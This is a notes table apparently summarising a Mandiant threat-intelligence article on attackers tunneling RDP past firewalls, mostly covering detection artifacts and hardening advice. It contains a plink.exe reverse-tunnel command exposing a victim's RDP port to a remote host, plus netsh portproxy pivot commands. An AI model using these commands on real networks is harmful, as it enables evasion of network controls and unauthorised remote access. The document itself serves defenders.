Bypassing Network Restrictions Through RDP Tunneling
by: David Pany, Steve Miller, Danielle Desfosses
January 24, 2019
Mandiant
| Notes |
|---|
| RDP |
| Mandiant |
| lateral movement |
| Evasion |
| Microsoft |
| Windows |
| “Threat actors continue to prefer RDP for the stability and functionality advantages over non-graphical backdoors” |
| firewall |
| NAT |
| tunneling |
| port forwarding |
| firewall “pinholes” |
| PuTTY |
| Plink plink.exe |
| SSH SSH malware |
| many IT environments either do not perform protocol inspection or do not block SSH communications outbound from their network |
| FIN8 |
| command and control |
| plink.exe <users>@<IP or domain> -pw <password> -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389 |
| phishing |
| foothold |
| persistence |
| Windows Network Shell (netsh) |
| jump box |
| netsh interface portproxy add v4tov4 listenport=8001 listenaddress=<JUMP BOX IP> connectport |
| netsh I p a v l=8001 listena=<JUMP BOX IP> connectp=3389 c=<DESTINATION IP> |
| default RDP port: TCP 3389 |
| https://cloud.google.com/blog/topics/threat-intelligence/establishing-baseline-remote-desktop-protocol |
| recommendation: disable RDP if not needed |
| recommendation: host-based firewall to restrict access to RDP |
| recommendation: enable the “Deny log on through Remote Desktop Services” |
| registry |
| HKEY_CURRENT_USER\Software\SimonTatham\PuTTY |
| HKEY_CURRENT_USER\SoftWare\SimonTatham\PuTTY\SshHostKeys |
| PortProxy |
| HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 |
| Event Logs |
| %systemroot%\Windows\System32\winevt\Logs\Microsoft-TerminalServices-LocalSessionmanager%3Operational.evtx |
| %systemroot%\Windows\System32\winevt\Logs\Security.evtx |
| “The “TerminalServices-LocalSessionManager” log contains successful interactive local or remote logon events as identified by EID 21 and successful reconnection of a previously established RDP session not terminated by a proper user logout as identified by EID 25” |
| “The “Security” log contains successful Type 10 remote interactive logons (RDP) as identified by EID 4624” |
| “A source IP address recorded as a localhost IP address (127.0.0.1 – 127.255.255.255) may be indicative of a tunneled logon routed from a listening localhost port to the localhost’s RDP port TCP 3389.” |
| Application Compatibility Cache/Shimcache |
| Amcache |
| Jump Lists |
| Prefetch |
| Service Events |
| CCM Recently Used Apps |
| WMI |
| Registry key |
| recommendation: content inspection of network traffic |
| recommendation: firewall workstation to workstation traffic |
| Snort |
| RDP handshake |